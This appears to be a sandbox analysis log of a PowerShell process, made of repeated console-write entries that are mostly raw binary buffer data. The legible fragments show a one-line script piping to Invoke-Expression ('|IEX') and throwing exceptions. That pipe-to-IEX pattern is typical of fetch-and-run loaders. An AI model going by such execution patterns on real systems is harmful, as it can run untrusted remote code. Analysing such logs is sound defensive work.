          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.w....'.................4k......T.............................}..v.....5......0...............................................
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.w....'...............U.4k....x6..............................}..v.....6......0...............(.T.............................
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.w....3.................4k......T.............................}..v.....=......0...............................................
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.w....3...............U.4k....x>..............................}..v.....>......0...............(.T.............................
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.w....?.................4k......T.............................}..v.....E......0...............................................
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.w....?...............U.4k....xF..............................}..v.....F......0...............(.T.............................
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.w....K.................4k......T.............................}..v.....M......0...............................................
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.w....K...............U.4k....xN..............................}..v.....N......0...............(.T.............................
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.w....W.................4k......T.............................}..v.....U......0...............................................
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.w....W...............U.4k....xV..............................}..v.....V......0...............(.T.............................
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.w....c.................4k......T.............................}..v.....]......0...............................................
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.w....c...............U.4k....x^..............................}..v.....^......0...............(.T.............................
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.w....o.................4k......T.............................}..v.....e......0...............................................
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.w....o...............U.4k....xf..............................}..v.....f......0...............(.T.............................
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.w....{.................4k......T.............................}..v.....m......0...............................................
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.w....{...............U.4k....xn..............................}..v.....n......0...............(.T.............................
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.w......................4k......T.............................}..v.....u......0...............................................
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.w....................U.4k....xv..............................}..v.....v......0...............(.T.............................
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.w......................4k......T.............................}..v.....}......0...............................................
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.w....................U.4k....x~..............................}..v.....~......0...............(.T.............................
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.w............).|.I.`.E.`.X.....T.............................}..v............0.................T.............................
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.w....................U.4k....`...............................}..v............0...............(.T.............................
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.w......................4k......T.............................}..v............0...............................................
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.w....................U.4k....`...............................}..v............0...............(.T.............................
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.w............ . . .E.x.c.e.p.t.i.o.n.........................}..v....x.......0.................T.............................
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.w....................U.4k....0...............................}..v............0...............(.T.............................
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.w......................4k......T.............................}..v............0.......................`.......................
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.w....................U.4k....................................}..v............0...............(.T.............................
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.w............ .........4k......T.............................}..v............0.................T.............................
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.w....................U.4k....X...............................}..v............0...............(.T.............................
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.w......................4k......T.............................}..v.....W......0.......................j.......................
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: .................B.............................. ...............................................................(.T.............................
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.w....'.......A.t. .l.i.n.e.:.1. .c.h.a.r.:.1.9.5.............}..v.....\......0.................T.....$.......................
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.w....'...............U.4k.....]..............................}..v.....^......0...............(.T.............................
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.w....3.................4k......T.............................}..v.....d......0...............................................
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.w....3...............U.4k.....e..............................}..v.....f......0...............(.T.............................
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.w....?.................4k......T.............................}..v.....l......0...............................................
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.w....?...............U.4k.....m..............................}..v.....n......0...............(.T.............................
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.w....K.................4k......T.............................}..v.....t......0...............................................
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.w....K...............U.4k.....u..............................}..v.....v......0...............(.T.............................
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.w....W.................4k......T.............................}..v.....|......0...............................................
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.w....W...............U.4k.....}..............................}..v.....~......0...............(.T.............................
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.w....c.................4k......T.............................}..v............0...............................................
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.w....c...............U.4k....................................}..v............0...............(.T.............................
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.w....o.................4k......T.............................}..v............0...............................................
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.w....o...............U.4k....................................}..v............0...............(.T.............................
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.w....{.................4k......T.............................}..v............0...............................................
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.w....{...............U.4k....................................}..v............0...............(.T.............................
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.w......................4k......T.............................}..v............0...............................................
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.w....................U.4k....................................}..v............0...............(.T.............................
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.w......................4k......T.............................}..v............0...............................................
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.w....................U.4k....................................}..v............0...............(.T.............................
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.w......................4k......T.............................}..v............0...............................................
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.w....................U.4k....................................}..v............0...............(.T.............................
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.w......................4k......T.............................}..v............0...............................................
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.w....................U.4k....................................}..v............0...............(.T.............................
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.w......................4k......T.............................}..v............0...............................................
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.w....................U.4k....................................}..v............0...............(.T.............................
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.w......................4k......T.............................}..v............0...............................................
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.w....................U.4k....................................}..v............0...............(.T.............................
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.w......................4k......T.............................}..v............0...............................................
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.w....................U.4k....................................}..v............0...............(.T.............................
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.w......................4k......T.............................}..v............0...............................................
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.w....................U.4k....................................}..v............0...............(.T.............................
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.w......................4k......T.............................}..v............0...............................................
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.w....................U.4k....................................}..v............0...............(.T.............................
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.w......................4k......T.............................}..v............0...............................................
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.w....................U.4k....................................}..v............0...............(.T.............................
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.w......................4k......T.............................}..v............0...............................................
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.w....................U.4k....................................}..v............0...............(.T.............................
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.w......................4k......T.............................}..v............0...............................................
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.w....................U.4k....................................}..v............0...............(.T.............................
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.w......................4k......T.............................}..v............0...............................................
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.w....................U.4k....................................}..v............0...............(.T.............................
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.w....#.................4k......T.............................}..v............0...............................................
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.w....#...............U.4k....................................}..v............0...............(.T.............................
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.w..../.................4k......T.............................}..v............0...............................................
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.w..../...............U.4k....................................}..v............0...............(.T.............................
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.w....;.................4k......T.............................}..v............0...............................................
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.w....;...............U.4k....................................}..v............0...............(.T.............................
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.w....G.................4k......T.............................}..v............0...............................................
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.w....G...............U.4k....................................}..v............0...............(.T.............................
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.w....S.................4k......T.............................}..v.....$......0...............................................
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.w....S...............U.4k.....%..............................}..v.....&......0...............(.T.............................
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.w...._.................4k......T.............................}..v.....,......0...............................................
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.w...._...............U.4k.....-..............................}..v............0...............(.T.............................
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.w....k.................4k......T.............................}..v.....4......0...............................................
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.w....k...............U.4k.....5..............................}..v.....6......0...............(.T.............................
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.w....w.................4k......T.............................}..v.....<......0...............................................
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.w....w...............U.4k.....=..............................}..v.....>......0...............(.T.............................
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.w......................4k......T.............................}..v.....D......0...............................................
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.w....................U.4k.....E..............................}..v.....F......0...............(.T.............................
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.w......................4k......T.............................}..v.....L......0...............................................
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.w....................U.4k.....M..............................}..v.....N......0...............(.T.............................
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.w......................4k......T.............................}..v.....T......0...............................................
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.w....................U.4k.....U..............................}..v.....V......0...............(.T.............................
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.w......................4k......T.............................}..v.....\......0...............................................
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.w....................U.4k.....]..............................}..v.....^......0...............(.T.............................
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.w......................4k......T.............................}..v.....d......0...............................................
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.w....................U.4k.....e..............................}..v.....f......0...............(.T.............................
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.w......................4k......T.............................}..v.....l......0...............................................
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.w....................U.4k.....m..............................}..v.....n......0...............(.T.............................
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.w......................4k......T.............................}..v.....t......0...............................................
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.w....................U.4k.....u..............................}..v.....v......0...............(.T.............................
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.w......................4k......T.............................}..v.....|......0...............................................
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.w....................U.4k.....}..............................}..v.....~......0...............(.T.............................
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.w......................4k......T.............................}..v............0...............................................
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.w....................U.4k....................................}..v............0...............(.T.............................
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.w......................4k......T.............................}..v............0...............................................
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.w....................U.4k....................................}..v............0...............(.T.............................
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.w......................4k......T.............................}..v............0...............................................
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.w....................U.4k....................................}..v............0...............(.T.............................
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.w......................4k......T.............................}..v............0...............................................
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.w....................U.4k....................................}..v............0...............(.T.............................
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.w......................4k......T.............................}..v............0...............................................
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.w....................U.4k....................................}..v............0...............(.T.............................
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.w......................4k......T.............................}..v............0...............................................
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.w....................U.4k....................................}..v............0...............(.T.............................
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.w....+.................4k......T.............................}..v............0...............................................
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.w....+...............U.4k....................................}..v............0...............(.T.............................
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.w....7.................4k......T.............................}..v............0...............................................
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.w....7...............U.4k....................................}..v............0...............(.T.............................
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.w....C.................4k......T.............................}..v............0...............................................
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.w....C...............U.4k....................................}..v............0...............(.T.............................
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.w....O.................4k......T.............................}..v............0...............................................
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.w....O...............U.4k....................................}..v............0...............(.T.............................
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.w....[.................4k......T.............................}..v............0...............................................
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.w....[...............U.4k....................................}..v............0...............(.T.............................
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.w....g.................4k......T.............................}..v............0...............................................
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.w....g...............U.4k....................................}..v............0...............(.T.............................
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.w....s.................4k......T.............................}..v............0...............................................
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.w....s...............U.4k....................................}..v............0...............(.T.............................
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.w......................4k......T.............................}..v............0...............................................
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.w....................U.4k....................................}..v............0...............(.T.............................
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.w......................4k......T.............................}..v............0...............................................
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.w....................U.4k....................................}..v............0...............(.T.............................
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.w............).|.I.`.E.`.X.....T.............................}..v............0.................T.............................
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.w....................U.4k....x...............................}..v............0...............(.T.............................
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.w......................4k......T.............................}..v............0...............................................
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.w....................U.4k....x...............................}..v............0...............(.T.............................
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.w............ . . .x.c.e.p.t.i.o.n...........................}..v............0.................T.............................
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.w....................U.4k....H...............................}..v............0...............(.T.............................
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.w......................4k......T.............................}..v............0.......................`.......................
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.w....................U.4k....................................}..v....(.......0...............(.T.............................
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.w............ .........4k......T.............................}..v............0.................T.............................
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.w....................U.4k....p...............................}..v............0...............(.T.............................
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.w.....................[4k.....IT.............................}..v............0.......................X.......................
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.w....................%X4k....H...............................}..v............0................FT.............................
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.w............A.t. .l.i.n.e.:.1. .c.h.a.r.:.2.1.5.............}..v............0...............XFT.....$.......................
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.w....................%X4k....................................}..v............0................FT.............................
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.w.....................[4k.....IT.............................}..v............0...............................................
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.w....................%X4k....................................}..v............0................FT.............................
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.w.....................[4k.....IT.............................}..v............0...............................................
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.w....................%X4k....................................}..v............0................FT.............................
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.w.....................[4k.....IT.............................}..v............0...............................................
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.w....................%X4k....................................}..v............0................FT.............................
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.w.....................[4k.....IT.............................}..v............0...............................................
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.w....................%X4k....................................}..v............0................FT.............................
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.w....#................[4k.....IT.............................}..v............0...............................................
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.w....#...............%X4k....................................}..v............0................FT.............................
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.w..../................[4k.....IT.............................}..v............0...............................................
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.w..../...............%X4k....................................}..v............0................FT.............................
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.w....;................[4k.....IT.............................}..v............0...............................................
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.w....;...............%X4k....................................}..v............0................FT.............................
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.w....G................[4k.....IT.............................}..v............0...............................................
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.w....G...............%X4k....................................}..v............0................FT.............................
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.w....S................[4k.....IT.............................}..v............0...............................................
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.w....S...............%X4k....................................}..v............0................FT.............................
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.w...._................[4k.....IT.............................}..v............0...............................................
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.w...._...............%X4k....................................}..v............0................FT.............................
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.w....k................[4k.....IT.............................}..v............0...............................................
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.w....k...............%X4k....................................}..v............0................FT.............................
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.w....w................[4k.....IT.............................}..v............0...............................................
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.w....w...............%X4k....................................}..v............0................FT.............................
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.w.....................[4k.....IT.............................}..v..... ......0...............................................
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.w....................%X4k.....!..............................}..v....."......0................FT.............................
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.w.....................[4k.....IT.............................}..v.....(......0...............................................
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.w....................%X4k.....)..............................}..v.....*......0................FT.............................
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.w.....................[4k.....IT.............................}..v.....0......0...............................................
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.w....................%X4k.....1..............................}..v.....2......0................FT.............................
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.w.....................[4k.....IT.............................}..v.....8......0...............................................
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.w....................%X4k.....9..............................}..v.....:......0................FT.............................
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.w.....................[4k.....IT.............................}..v.....@......0...............................................
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.w....................%X4k.....A..............................}..v.....B......0................FT.............................
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.w.....................[4k.....IT.............................}..v.....H......0...............................................
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.w....................%X4k.....I..............................}..v.....J......0................FT.............................
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.w.....................[4k.....IT.............................}..v.....P......0...............................................
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.w....................%X4k.....Q..............................}..v.....R......0................FT.............................
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.w.....................[4k.....IT.............................}..v.....X......0...............................................
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.w....................%X4k.....Y..............................}..v.....Z......0................FT.............................
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.w.....................[4k.....IT.............................}..v.....`......0...............................................
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.w....................%X4k.....a..............................}..v.....b......0................FT.............................
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.w.....................[4k.....IT.............................}..v.....h......0...............................................
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.w....................%X4k.....i..............................}..v.....j......0................FT.............................
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.w.....................[4k.....IT.............................}..v.....p......0...............................................
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.w....................%X4k.....q..............................}..v.....r......0................FT.............................
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.w.....................[4k.....IT.............................}..v.....x......0...............................................
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.w....................%X4k.....y..............................}..v.....z......0................FT.............................
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.w.....................[4k.....IT.............................}..v............0...............................................
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.w....................%X4k....................................}..v............0................FT.............................
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.w.....................[4k.....IT.............................}..v............0...............................................
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.w....................%X4k....................................}..v............0................FT.............................
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.w....+................[4k.....IT.............................}..v............0...............................................
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.w....+...............%X4k....................................}..v............0................FT.............................
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.w....7................[4k.....IT.............................}..v............0...............................................
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.w....7...............%X4k....................................}..v............0................FT.............................
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.w....C................[4k.....IT.............................}..v............0...............................................
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.w....C...............%X4k....................................}..v............0................FT.............................
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.w....O................[4k.....IT.............................}..v............0...............................................
